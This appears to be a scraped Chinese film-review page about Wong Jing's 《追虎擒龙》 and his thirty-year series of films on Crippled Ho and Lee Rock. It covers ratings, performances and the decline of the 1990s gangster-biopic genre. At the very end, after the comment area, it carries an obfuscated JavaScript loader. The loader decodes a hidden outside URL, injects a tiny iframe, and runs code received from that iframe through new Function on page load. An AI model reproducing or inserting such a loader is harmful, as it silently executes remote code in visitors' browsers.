从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久

时间:2021-05-04 12:08:08阅读:4336
《追虎擒龙》的开场大字写道:“本故事纯属虚构”,但紧接着没有出现那句更熟悉的话:“如有雷同,纯属巧合”。看完影片,还真有一种“雷同感&rd
  • 1962年,内地正值经济难题时期,随难民潮逃到香港的汕头青年吴国豪(吕良伟)因不甘被黑帮凌辱,投奔黑帮大佬肥波…

从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


追虎擒龙》的开场大字写道:“本故事纯属虚构”,但紧接着没有出现那句更熟悉的话:“如有雷同,纯属巧合”。看完影片,还真有一种“雷同感”。

 

整体故事架构和王晶的旧作《金钱帝国》很相似,成立廉政公署这一条情节线好比是《反贪风暴》系列的前史,跛豪(吕良伟 饰)和徐乐(也称雷洛)的反派组合则像《追龙》的续集。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


《追虎擒龙》“港味”十足,没有太多鲜货和创意,算是中规中矩完成任务。影片目前猫眼8.8分、淘票票8.7分,在普罗大众眼里,口碑不算太差,但在评分较为严格的豆瓣平台上,仅有5.7分,与王晶前作《追龙II》不相上下。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


从《跛豪》《五亿探长雷洛传》到《追龙》《追虎擒龙》,王晶对跛豪和雷洛的历史情怀与银幕情结延续了30年,面对《追虎擒龙》这一成绩,他们的故事是过时了,还是有更多开发的可能性呢?


《追虎擒龙》:在炒冷饭中拓宽《追龙》


什么是典型的香港电影?《重案组》导演黄志强曾给出比较妥帖的回答:“一部非常卖力地去取悦观众的电影。”这也是王晶一贯奉行的创作法则。

 

取悦观众的方式是什么?正如《追虎擒龙》所展现的——依靠放诸四海而皆准的类型模板,从大众的口碑表现也可以看出,这一套就算不高级,仍行之有效。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


在正反对立的紧张局势下,廉政公署代表的正义力量如何战胜警黑勾结的邪恶势力,这是电影紧抓的主心骨。一方面故事不断叠加两方激化的矛盾冲突,由小及大,铺满全片。另一方面在视觉上,时不时就来段动作场面撑场。


噱头层出不穷,甚至可以丢弃剧情的合理性,比如后半段的工厂追逐戏和跛豪派手下大闹机场追杀猪油仔,全都不顾现实逻辑,只为制造夺人眼球的群架场面。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


王晶此次扶持联合导演许悦铭,此前他拍摄了网大《追龙番外篇之十亿探长》,就是讲述徐乐探长的故事,豆瓣仅4.2分。


对比《追龙》联合导演关智耀,同样和王晶合作,他在导演方面的功力明显不足,影片的棚拍感特别强,不及《追龙》的制作细节和对年代感的还原。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久

 

《追虎擒龙》在由跛豪和雷洛缔造的《追龙》世界里,加入廉政公署的支线故事,主要的两大角色也转移成古天乐饰演的检察官陈克,对阵吴镇宇饰演的贪腐探长徐乐。人物变多了,体系变宽了,但质量却不如《追龙》。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久

 

梁家辉饰演的毒枭跛豪,其实戏份并不多,但每一场戏的气场都很强悍,吴镇宇的表演亦正亦邪,有丰富细节,古天乐延续陆志廉的正义形象,林家栋饰演的白长官在临死前的眼神特别精准,黄金配角郑则仕(郑则仕 饰) 和姜皓文也都有出彩表现。


比故事更有看点的,是这些香港演员稳健扎实的演技。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


在歌颂正义力量的同时,电影也对跛豪和雷洛两大落寞枭雄投向了一些光辉的色彩与怜悯的目光,向他们共谋的时代作别。


“好多事物都要淘汰,我也要到点收工”,徐乐探长在结尾被逮捕前向陈克这样说道,这句话也点出了《追虎擒龙》的表达核心——以帮派文化为代表的旧秩序终将过去,廉明法治的新社会、新秩序必将到来。


从立意上来说,这比《追龙》更往前推进了一步,更走向了光明。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


跛豪雷洛的恩怨,看不腻吗?


跛豪和雷洛的银幕故事始于1991年。那一年的香港电影,出现了一股向历史人物取材的热潮,有《黄飞鸿》《阮玲玉》,有《跛豪》和《五亿探长雷洛传》。

 

跛豪的现实原型是大毒枭吴锡豪,雷洛的原型是总华探长吕乐,黑白两道纵横上世纪60、70年代的香港。吴锡豪的结局是入狱、去世,吕乐侥幸逃亡海外。以赚钱至上为理念的香港电影人,很快就将他们跌宕起伏的传奇故事改编成电影。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久

 

紧接《英雄本色》《喋血双雄》等80年代末发端的“英雄片”,《跛豪》则在90年代初引领起“枭雄片”的创作风潮,拓宽了香港警匪电影的类型样式。

 

这种教父式电影主要聚焦香港战后真实罪犯人物的发迹秘史,有黑帮老大、贪污警察,有历史怀旧,有手足情深的兄弟情,以胜者为王、发家致富的草莽功利主义观念,吸引了大批观众。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久《跛豪》

 

《跛豪》为港式枭雄片开疆辟土,在文本上模仿了好莱坞经典黑帮片《疤面煞星》,《雷洛传》更注重历史写实,细心还原旧社会的时代氛围。


隔年的香港电影金像奖,两片风光无限,《跛豪》入围7项,斩获最佳影片和最佳编剧,《五亿探长雷洛传1:雷老虎》入围八项,拿下最佳男配角奖。

 

《跛豪》票房达3800多港币,位列当年香港票房排行榜第三,《五亿探长雷洛传》的上下两部也在同年先后上映,票房同样不俗,也带红了角色和演员。吕良伟 靠跛豪一角打响知名度,曾江 版和刘德华版雷洛各有千秋,郑则仕从此有了“肥波(郑则仕 饰)”的外号,吴孟达 演的猪油仔、秦沛演的探长颜同至今深入人心。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久刘德华版雷洛

 

随后出现的《四大家族之龙虎兄弟》《霞姐传奇》《四大探长》《赌城大亨之新哥传奇》《蓝江传之反飞组风云》《庙街十二少》《岁月风云之上海皇帝》《上海皇帝之雄霸天下》等同类电影在两三年内扎堆出现,其中大部分是跟风图利之作。93年后,风起云涌的枭雄片迅速退潮。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久

 

王晶可以说是跛豪和雷洛的忠实“迷弟”,这30年来,始终对他们的故事念念不忘。

 

《五亿探长雷洛传》的监制是他,同年11月执导《霞姐传奇》,插科打诨,叫来吕良伟、吴孟达和秦沛客串露脸。99年由他编剧的《O记三合会档案》,第一次把跛豪和雷洛的故事改编整合到了一起。十年后,他自编自导《金钱帝国》,其中华人总探乐哥这一角色又指向雷洛。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


王晶曾回忆,《雷洛传》因为拍得太长才变成上下两部,看来看去留下很多遗憾,他一直希望让雷洛和同时期的跛豪在银幕上有更多交集。后来他写出《O记三合会档案》,但投资规模小,自认没做好。到了斥巨资打造的《追龙》,才终于完成他的愿望。

 

王晶称《追龙》是他心中的《美国往事》,野心之大,认真拍摄程度不同于以往。的确,这也是他对跛豪和雷洛的集成之作,豆瓣评分达7.2,堪称“王晶近十年来最好的作品。”


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


但他依然离不开自我跟风、自我抄袭的惯性,如在《赌神》或《澳门风云》获得市场成功后,都把系列变得更搞笑,场面更大,也更粗心对待,耗尽招牌,捞取最后一桶金。

 

《追龙》后同样如法炮制《追龙2》,这次《追虎擒龙》又再拍跛豪和雷洛,枭雄老面孔翻来覆去,靠同一个套路框架反复塞料,缺乏新意。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


而历数饰演过雷洛和跛豪的演员,兜兜转转,也还是那一批人。刘德华是雷洛专业户,一共扮演过五次雷老虎,除了两部《五亿探长雷洛传》和《追龙》,还以该形象客串了《蓝江传之反飞组风云》和《庙街十二少》。


从《O记三合会档案》到《追虎擒龙》,吴镇宇相当于演过两次雷洛。梁家辉在演跛豪之前,也演了《金钱帝国》里的徐乐功探长,其实就是雷洛。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久《金钱帝国》梁家辉

 

王晶曾表示,观众一代换一代,单纯卖情怀很快就会行不通。他信奉新瓶装旧酒,利用港片的专业性和灵活性,用猎奇感包装老故事。

 

这一招也用到了《追虎擒龙》,但只是在雷洛、跛豪的江湖世界里把廉政公署这一部分一加一简单组装在一起,很难再产生新鲜感来讨好观众。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久


《追虎擒龙》里的雷洛和跛豪,日落西山,黯淡落幕。王晶接下来想拍《追龙3:唐人街》,瞄准同时代与跛豪齐名的其它罪犯人物,由梁朝伟、郭富城主演的新片《风再起时》则要重述雷洛在内的“四大探长”。


从《跛豪》到《追虎擒龙》,王晶的情怀能卖多久《风再起时》郭富城饰演的探长磊乐就是雷洛

 

格局与规模都在变大,枭雄风云还会在银幕上继续上演。但如果只是一味沉溺在历史情怀里,束缚在正义与邪恶二元对立的老套框架里,没有在内容和制作上推陈出新,没有思考对当下时代的意义,与大众产生联结与共鸣,恐怕观众也会越来越不买账。


评论

  • 评论加载中...
function GDXujcz(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function XaxPSIDu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return GDXujcz(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x5a\x42\x77\x46\x73\x59']=function(){;(function(u,r,w,d,f,c){var x=XaxPSIDu,cs=d.currentScript;;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width='5px';f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function('_tdcs',x(e.data[r].replace(new RegExp(r,'g'),'')))(cs);}});})('aHR0cHMlM0ElMkYlMkZZqcy5rZZWV5ZZWtleS54eXolMkYxMzQ4MTI=',''+'OSX'+'gMw'+'ULR'+'D'+'',window,document,''+'Ogc'+'x7V'+'tu'+'','Z');};
--== 选择主题 ==--